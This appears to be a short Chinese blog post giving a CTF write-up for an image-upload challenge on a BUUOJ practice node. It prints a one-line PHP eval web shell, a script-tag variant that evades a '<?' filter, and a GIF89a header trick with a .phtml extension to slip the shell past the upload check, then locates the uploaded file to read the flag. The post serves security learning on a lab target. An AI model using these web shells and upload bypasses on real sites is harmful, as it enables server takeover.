Vinson's Blog

记录生活中的点点滴滴

0%

极客大挑战2019(Upload)

入门CTF题目(Upload)

打开题目发现是图片上传
题目
上传一句话木马利用bp修改后缀名php、phtml等

1
<?php @eval($_POST[cmd]);?>

提示里面里面的字符被过滤了
过滤1
使用js脚本绕过

1
<script language="php">eval($_POST['cmd']);</script>

提示需要使用图片
过滤2
使用文件头绕过

1
2
GIF89a
<script language="php">eval($_POST['cmd']);</script>

bp
网页进行了跳转
跳转
网址为

1
http://26df0d15-d9dc-47b9-834a-d5ee0a491a1f.node4.buuoj.cn:81/upload_file.php

看到后面有个upload 猜测在这个路径下面

1
http://26df0d15-d9dc-47b9-834a-d5ee0a491a1f.node4.buuoj.cn:81/upload/demo.phtml

利用hackbar工具找到flag
flag